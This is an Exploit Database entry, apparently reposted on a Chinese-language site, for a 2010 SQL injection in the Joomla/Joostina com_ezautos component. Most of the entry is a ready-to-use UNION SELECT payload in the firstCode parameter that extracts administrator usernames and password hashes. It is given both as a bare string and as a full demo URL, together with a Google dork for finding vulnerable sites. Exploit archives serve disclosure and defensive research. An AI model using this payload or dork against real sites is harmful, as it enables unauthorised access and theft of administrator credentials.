Joomla! Component Joostina – SQL Injection

• Exploit Database
• 12 阅读

• 作者： Gamoscu
  日期： 2010-09-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15085/

• #
  # Note:This does not affect the current version of this component. It was patched more than 15 months ago.
  #
  #
  Joomla (joostina)Component com_ezautos SQL Injection Vulnerability
  
  ###########################
  
  Author : Gamoscu
  
  Homepage : http://www.1923turk.com
  
  Blog :http://gamoscu.wordpress.com/
  
  Script : Joomla http://www.joostina-cms.org/content/view/20/35/
  
  Dork : inurl:com_ezautos
  ###########################
  
  [ Vulnerable File ]
  
  index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 [ SQL ]
  
  [ XpL ]
  
  +and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--
  
  [ Demo]
  
  http://xxxxx/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username,0x3a,password),4,5,6,7+from+%23__users+where+gid=25+or+gid=24+and+block%3C%3E1--
  
  ##############################################################
  #
  #
  #
  # Baybora: http://baybora.wordpress.com/
  #
  # Manas58 – Delibey – Tiamo – Psiko – Turco – infazci – X-TRO
  #
  #
  #
  ##Elektrikist#
  #
  #############################################